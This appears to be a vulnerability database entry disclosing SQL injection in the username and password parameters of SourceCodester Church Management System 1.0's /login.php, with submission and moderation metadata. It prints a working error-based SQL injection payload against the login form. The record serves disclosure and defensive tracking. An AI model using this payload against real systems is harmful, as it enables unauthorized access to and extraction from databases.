| tiêu đề | Church Management System-SQL injections |
|---|
| Mô tả | Church Management System-SQL injections
Date: 2022-08/06
Exploit Author: [email protected]
Vendor Homepage:
https://www.sourcecodester.com
Software Link:
https://www.sourcecodester.com/php/11206/church-management-system.html
Version: 1.0
/login.php
username、passwordParameters have SQL injection
payload
login=Login&password=admin&username=' OR (SELECT 7064 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(7064=7064,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jURL |
|---|
| Nguồn | ⚠️ https://github.com/anx0ing/CVE_demo/blob/main/2022/Church%20Management%20System-SQL%20injections.md |
|---|
| Người dùng | anx0ing (UID 30698) |
|---|
| Đệ trình | 05/08/2022 20:17 (cách đây 4 những năm) |
|---|
| Kiểm duyệt | 05/08/2022 20:50 (33 minutes later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 205668 [SourceCodester Church Management System 1.0 /login.php tên người dùng Tiêm SQL] |
|---|
| điểm | 20 |
|---|